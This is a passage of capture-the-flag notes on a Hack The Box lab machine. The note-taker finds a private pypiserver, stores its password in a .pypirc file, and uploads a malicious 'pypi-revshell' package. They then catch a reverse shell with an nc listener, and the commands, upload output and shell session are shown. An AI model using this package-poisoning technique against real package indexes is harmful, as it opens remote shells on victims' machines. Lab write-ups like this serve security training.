9 localhost:5000 > low
developer@sneakymailer:/tmp$ curl localhost:5000
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Welcome to pypiserver!</title>
</head><body><h1>Welcome to pypiserver!</h1>
<p>This is a PyPI compatible package index serving 0 packages.</p>
<p>To use this server with <code>pip</code>, run the following command:
<pre><code>pip install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code>
</pre></p>
<p>To use this server with <code>easy_install</code>, run the following command:
<pre><code>easy_install --index-url http://localhost:5000/simple/ PACKAGE [PACKAGE2...]</code></pre></p>
<p>The complete list of all packages can be found <a href="/packages/">here</a> or via the <a href="/simple/">simple</a> index.</p>
<p>This instance is running version 1.3.2 of the <a href="https://pypi.org/project/pypiserver/">pypiserver</a> software.</p>
</body></html>
# its PyPi server, time to port forward using chisel
| same as http://pypi.sneakycorp.htb:8080/
Reading https://pypi.org/project/pypiserver/
| https://pypi.org/project/pypiserver/#uploading-packages-remotely
this talks about authentication
# the way the process is running
pypi 683 0.0 0.6 36800 26152 ? Ss Sep29 0:07 /var/www/pypi.sneakycorp.htb/venv/bin/python3 /var/www/pypi.sneakycorp.htb/venv/bin/pypi-server -i 127.0.0.1 -p 5000 -a update,download,list -P /var/www/pypi.sneakycorp.htb/.htpasswd --disable-fallback -o /var/www/pypi.sneakycorp.htb/packages
# -a: actions for which pasword will be needed
# -P: password-file
# --disable-fallback: will not revert to system-pip incass of errors
we need to create a malicious python package repo
| https://www.linode.com/docs/guides/how-to-create-a-private-python-package-repository/
Using https://github.com/iamkashz/pypi-revshell
# using setuptools to upload
https://pypi.org/project/pypiserver/#upload-with-setuptools
# create file ~/.pypirc
[distutils]
index-servers =
sneakymailer
[sneakymailer]
repository: http://pypi.sneakycorp.htb:8080/
username: pypi
password: soufianeelhaoui
# to create package
$ python setup.py sdist
Creating tar archive
# under sdist folder
$ python setup.py sdist upload -r sneakymailer
running sdist
running egg_info
writing pypi_revshell.egg-info/PKG-INFO
writing top-level names to pypi_revshell.egg-info/top_level.txt
writing dependency_links to pypi_revshell.egg-info/dependency_links.txt
reading manifest file 'pypi_revshell.egg-info/SOURCES.txt'
writing manifest file 'pypi_revshell.egg-info/SOURCES.txt'
running check
warning: check: missing required meta-data: url
creating pypi-revshell-0.0.1
creating pypi-revshell-0.0.1/pypi_revshell.egg-info
copying files to pypi-revshell-0.0.1...
copying README.md -> pypi-revshell-0.0.1
copying setup.cfg -> pypi-revshell-0.0.1
copying setup.py -> pypi-revshell-0.0.1
copying pypi_revshell.egg-info/PKG-INFO -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/SOURCES.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/dependency_links.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/not-zip-safe -> pypi-revshell-0.0.1/pypi_revshell.egg-info
copying pypi_revshell.egg-info/top_level.txt -> pypi-revshell-0.0.1/pypi_revshell.egg-info
Writing pypi-revshell-0.0.1/setup.cfg
Creating tar archive
removing 'pypi-revshell-0.0.1' (and everything under it)
running upload
Submitting dist/pypi-revshell-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080/
Server response (200): OK
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.197] 57994
low@sneakymailer:/$ whoami;id;hostname
whoami;id;hostname
low
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
sneakymailer
# can put in ssh keys and get stable shell
Last updated